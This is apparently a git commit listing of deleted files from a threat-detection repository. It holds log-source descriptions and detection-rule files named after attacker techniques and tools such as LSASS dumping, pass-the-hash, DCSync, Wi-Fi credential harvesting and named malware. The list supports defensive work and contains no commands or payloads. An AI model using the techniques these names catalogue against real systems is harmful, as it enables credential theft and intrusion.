 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0050_1102_audit_log_was_cleared.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0051_1121_attack_surface_reduction_blocking_mode_event.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0052_2003_query_to_load_usb_drivers.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0053_2100_pnp_or_power_operation_for_usb_device.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0054_2102_pnp_or_power_operation_for_usb_device.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0054_linux_auditd_execve.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0055_linux_auditd_read_access_to_file.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0056_linux_auditd_syscall.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0057_4625_account_failed_to_logon.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0058_4656_handle_to_an_object_was_requested.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0059_4657_registry_value_was_modified.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0060_4658_handle_to_an_object_was_closed.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0061_4660_object_was_deleted.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0062_4663_attempt_was_made_to_access_an_object.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0063_4697_service_was_installed_in_the_system.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0064_4698_scheduled_task_was_created.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0065_4701_scheduled_task_was_disabled.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0066_4704_user_right_was_assigned.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0067_4719_system_audit_policy_was_changed.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0068_4728_member_was_added_to_security_enabled_global_group.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0069_4732_member_was_added_to_security_enabled_local_group.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0070_4735_security_enabled_local_group_was_changed.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0071_4737_security_enabled_global_group_was_changed.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0072_4755_security_enabled_universal_group_was_changed.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0073_4756_member_was_added_to_a_security_enabled_universal_group.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0074_4765_sid_history_was_added_to_an_account.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0075_4766_attempt_to_add_sid_history_to_an_account_failed.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0076_4768_kerberos_authentication_ticket_was_requested.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0077_4769_kerberos_service_ticket_was_requested.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0078_4771_kerberos_pre_authentication_failed.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0079_4776_computer_attempted_to_validate_the_credentials_for_an_account.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0080_5859_wmi_activity.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0081_5861_wmi_activity.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0082_8002_ntlm_server_blocked_audit.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0083_16_access_history_in_hive_was_cleared.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0084_av_alert.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0085_22_windows_sysmon_DnsQuery.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0086_4720_user_account_was_created.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0087_5156_windows_filtering_platform_has_permitted_connection.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0088_4616_system_time_was_changed.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0089_56_terminal_server_security_layer_detected_an_error.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0090_50_terminal_server_security_layer_detected_an_error.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0091_linux_modsecurity_log.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0092_unix_generic_syslog.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0093_linux_clamav_log.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0094_linux_sshd_log.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0095_linux_auth_pam_log.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0096_linux_named_client_security_log.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0097_linux_daemon_log.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0098_linux_vsftpd_log.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0099_Bind_DNS_query.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0100_Passive_DNS_log.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0108_150_dns_server_could_not_load_dll.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/av_exploiting.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/av_password_dumper.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/av_relevant_files.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/av_webshell.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/mal_azorult_reg.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_alternate_powershell_hosts.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_clear_powershell_history.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_create_local_user.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_data_compressed.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_dnscat_execution.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_downgrade_attack.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_exe_calling_ps.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_invoke_obfuscation_obfuscated_iex.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_malicious_commandlets.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_malicious_keywords.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_nishang_malicious_commandlets.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_ntfs_ads_access.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_prompt_credentials.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_psattack.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_remote_powershell_session.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_shellcode_b64.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_download.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_invocation_generic.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_invocation_specific.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_keywords.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_profile_create.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_winlogon_helper_dll.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_wmimplant.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/powershell_xor_commandline.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_ads_executable.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_alternate_powershell_hosts_pipe.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_apt_muddywater_dnstunnel.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_apt_turla_namedpipes.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_cactustorch.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_cmstp_execution.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_cobaltstrike_process_injection.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_createremotethread_loadlibrary.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_cred_dump_tools_named_pipes.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_hack_wce.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_logon_scripts_userinitmprlogonscript_proc.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_mal_namedpipes.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_password_dumper_lsass.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_possible_dns_rebinding.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_raw_disk_access_using_illegitimate_tools.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_susp_powershell_rundll32.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_suspicious_remote_thread.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_wmi_event_subscription.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/sysmon_wmi_susp_scripting.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_GPO_scheduledtasks.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_account_backdoor_dcsync_rights.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_account_discovery.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_ad_object_writedac_access.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_ad_replication_non_machine_account.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_ad_user_enumeration.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_admin_rdp_login.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_admin_share_access.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_advanced_ip_scanner.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_alert_active_directory_user_control.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_alert_ad_user_backdoors.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_alert_enable_weak_encryption.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_alert_lsass_access.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_alert_mimikatz_keywords.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_alert_ruler.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_apt29_thinktanks.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_apt29_tor.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_babyshark.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_bear_activity_gtr19.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_bluemashroom.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_carbonpaper_turla.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_chafer_mar18.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_cloudhopper.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_dragonfly.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_elise.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_emissarypanda_sep19.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_empiremonkey.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_equationgroup_dll_u_load.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_gallium.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_greenbug_may20.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_hurricane_panda.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_judgement_panda_gtr19.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_ke3chang_regadd.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_lazarus_session_highjack.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_mustangpanda.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_slingshot.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_sofacy.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_stonedrill.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_ta17_293a_ps.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_tropictrooper.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_turla_commands.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_turla_comrat_may20.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_turla_service_png.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_unidentified_nov_18.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_winnti_mal_hk_jan20.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_wocao.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_apt_zxshell.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_atsvc_task.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_attrib_hiding_files.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_audit_cve.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_av_relevant_match.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_bootconf_mod.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_bypass_squiblytwo.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_change_default_file_association.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_cmdkey_recon.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_cmstp_com_object_access.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_commandline_path_traversal.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_control_panel_item.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_copying_sensitive_files_with_credential_data.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_crime_fireball.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_crime_maze_ransomware.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_data_compressed_with_rar.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_dcsync.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_defender_bypass.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_defender_disabled.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_defender_threat.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_disable_event_logging.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_dns_exfiltration_tools_execution.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_dpapi_domain_backupkey_extraction.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_dpapi_domain_masterkey_backup_attempt.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_dsquery_domain_trust_discovery.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_encoded_frombase64string.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_encoded_iex.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_etw_modification.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_etw_modification_cmdline.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_etw_trace_evasion.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_exfiltration_and_tunneling_tools_execution.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2015_1641.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2017_0261.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2017_11882.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2017_8759.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2019_1378.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2019_1388.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2020_10189.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2020_1048.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_external_device.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_file_permission_modifications.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_global_catalog_enumeration.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_grabbing_sensitive_hives_via_reg.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_hack_bloodhound.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_hack_koadic.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_hack_rubeus.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_hack_secutyxploded.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_hack_smbexec.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_hh_chm.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_hktl_createminidump.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_html_help_spawn.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_hwp_exploits.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_impacket_lateralization.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_impacket_secretdump.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_indirect_cmd.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_install_reg_debugger_backdoor.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_interactive_at.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_invoke_obfuscation_obfuscated_iex_commandline.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_invoke_obfuscation_obfuscated_iex_services.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_lethalhta.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_lm_namedpipe.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_local_system_owner_account_discovery.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_lsass_access_non_system_account.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_lsass_dump.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_mal_adwind.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_mal_blue_mockingbird.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_mal_creddumper.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_mal_flowcloud.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_mal_octopus_scanner.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_mal_ryuk.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_mal_service_installs.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_mal_ursnif.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_mal_wceaux_dll.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_malware_dridex.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_malware_dtrack.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_malware_emotet.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_malware_formbook.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_malware_notpetya.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_malware_qbot.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_malware_ryuk.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_malware_script_dropper.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_malware_trickbot_recon_activity.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_malware_wannacry.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_mavinject_proc_inj.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_metasploit_authentication.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_meterpreter_or_cobaltstrike_getsystem_service_installation.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_meterpreter_or_cobaltstrike_getsystem_service_start.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_mimikatz_command_line.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_mmc20_lateral_movement.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_mmc_spawn_shell.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_mshta_javascript.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_mshta_spawn_shell.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_multiple_suspicious_cli.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_net_enum.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_net_ntlm_downgrade.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_net_user_add.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_netsh_allow_port_rdp.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_netsh_fw_add.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_netsh_fw_add_susp_image.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_netsh_packet_capture.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_netsh_port_fwd.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_netsh_port_fwd_3389.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_netsh_wifi_credential_harvesting.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_network_sniffing.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_new_or_renamed_user_account_with_dollar_sign.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_new_service_creation.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_non_interactive_powershell.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_not_allowed_rdp_access.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_office_shell.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_office_spawn_exe_from_users_directory.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_overpass_the_hash.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_pass_the_hash.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_pass_the_hash_2.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_pcap_drivers.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_plugx_susp_exe_locations.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_possible_applocker_bypass.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_possible_dc_shadow.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_powershell_amsi_bypass.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_powershell_audio_capture.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_powershell_b64_shellcode.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_powershell_bitsjob.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_powershell_dll_execution.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_powershell_downgrade_attack.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_powershell_download.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_powershell_frombase64string.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_powershell_suspicious_parameter_variation.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_powershell_web_request.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_powershell_xor_commandline.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_powersploit_empire_schtasks.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_proc_wrong_parent.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_process_creation_bitsadmin_download.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_process_dump_rundll32_comsvcs.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_protected_storage_service_access.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_psexesvc_start.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_quarkspwdump_clearing_hive_access_history.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_query_registry.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_rare_schtask_creation.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_rare_schtasks_creations.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_rare_service_installs.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_rdp_bluekeep_poc_scanner.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_rdp_hijack_shadowing.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_rdp_localhost_login.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_rdp_potential_cve-2019-0708.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_rdp_reverse_tunnel.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_redmimicry_winnti_proc.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_register_new_logon_process_by_rubeus.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_remote_powershell_session.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_remote_powershell_session_process.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_remote_registry_management_using_reg_utility.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_remote_time_discovery.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_renamed_binary.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_renamed_binary_highly_relevant.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_renamed_jusched.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_renamed_paexec.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_renamed_powershell.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_renamed_procdump.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_renamed_psexec.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_run_powershell_script_from_ads.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_sam_registry_hive_handle_request.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_scm_database_handle_failure.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_scm_database_privileged_operation.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_sdbinst_shim_persistence.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_service_execution.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_service_stop.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_shadow_copies_access_symlink.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_shadow_copies_creation.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_shadow_copies_deletion.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_shell_spawn_susp_program.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_silenttrinity_stage_use.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_soundrec_audio_capture.md
 delete mode 100644 Atomic_Threat_Coverage/Detection_Rules/win_spn_enum.md
